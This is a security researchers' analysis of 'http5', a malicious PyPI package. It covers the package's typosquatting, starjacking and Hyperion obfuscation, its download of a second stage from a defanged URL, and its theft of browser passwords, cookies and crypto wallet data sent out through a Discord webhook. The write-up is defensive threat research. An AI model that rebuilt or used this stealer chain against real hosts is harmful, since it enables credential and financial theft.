What is the package name: http5
When was it released: Jan 3, 2023
Which version we are talking about: 0.0.1
How many times it was downloaded in 30 days: 61
What the package says it to be: “A small example package”
We first observed a package performing “starjacking” in the project https://github.com/pypa/sampleproject. We flagged the package for further investigation.
From our preliminary analysis, the name ‘http5’ looked suspicious and a victim could fall prey to this package as it sounded like a new version of HTTP library or any such popular package like “HTTP3” . So, we started analyzing the code.
During our analysis, we came across the name ‘billythegoat356’ in the source code and a quick search yielded very few results from which we learned that there is a similar campaign “WASP Stealer” tracked by Checkmarx’ supply chain security research team.
Based on the similarity of the code-base and obfuscation techniques as explained in their blog and also their research on hunting for WASP stealer led us to attribute “Discock Stealer” to “WASP Stealer”.
During our further analysis, it was noted that the package was obfuscated using “Hyperion” and specially crafted to target hosts running Windows Operating Systems. Once the package is installed and executed on the victim’s host, it fetches a malicious piece of python code and saves it on the victim’s machine.
Later the package tries to collect sensitive information such as cookies, saved passwords in a browser, saved cookies of gaming applications and steals financial information from crypto wallets. All the discovered data is saved inside 2 files named wppassw.txt and wpcook.txt. The saved data is later exfiltrated through a discord webhook API. Additionally, it also collected the victim’s geo location based on the public IP address.
As we can observe from the screenshot below the http5 package initially creates a file with a random name in the temp directory of the victim’s host which then fetches a malicious piece of code downloaded from the stage-1 — hxxps[:]//www[.]ciqertools[.]xyz/discock
The hosted malicious code looks like the code of packages mentioned in Checkmarx research blog posts on WASP Stealer. Also, it can be observed that it is using Hyperion obfuscator to obfuscate its code. Since, it was not possible to conclude anything based on the static code analysis quickly, we decided to conduct a dynamic analysis in our sandbox environment.
While we executed the python code inside a sandbox Linux environment, there was no indication of any network communications or system calls made, and it immediately exited. Hence, we decided to test it further on Windows environment.
When we executed the python code on Windows, we noted that it tries to perform multiple lookups.
All the discovered data is saved inside 2 files named wppassw.txt and wpcook.txt. The saved data is later exfiltrated through a discord webhook API. Along with this it also collects the victim’s geo-location based on the public IP address. The behaviour is quite similar to previously known malicious packages shared on Kaspersky blog.
Though we understand the objective of the adversary here, we are not certain how widespread is their campaign. Attacks on the software supply chain kept evolving day by day. The level of obfuscation used in this package to circumvent the security measures is a strong indication and highlights the importance of conducting a thorough analysis of open-source dependencies in use. We also observed few researchers (claimed as) who published similar packages with malicious content such as ”cxcxcx”. At some point we also thought this package could be one among them. However, we continue to research and track the campaign irrespective of any ecosystem.
Dhanesh Hitesh Dodia — Security Researcher, Loginsoft
Kartik Singh — Security Researcher, Loginsoft
For similar attacks refer the blogs from Checkmarkx and Phylum research team.
https://medium.com/checkmarx-security/wasp-attack-on-python-polymorphic-malware-shipping-wasp-stealer-infecting-hundreds-of-victims-10e92439d192
https://medium.com/checkmarx-security/hunting-for-malicious-code-the-dangers-of-wasp-stealer-e0d073913623
https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack
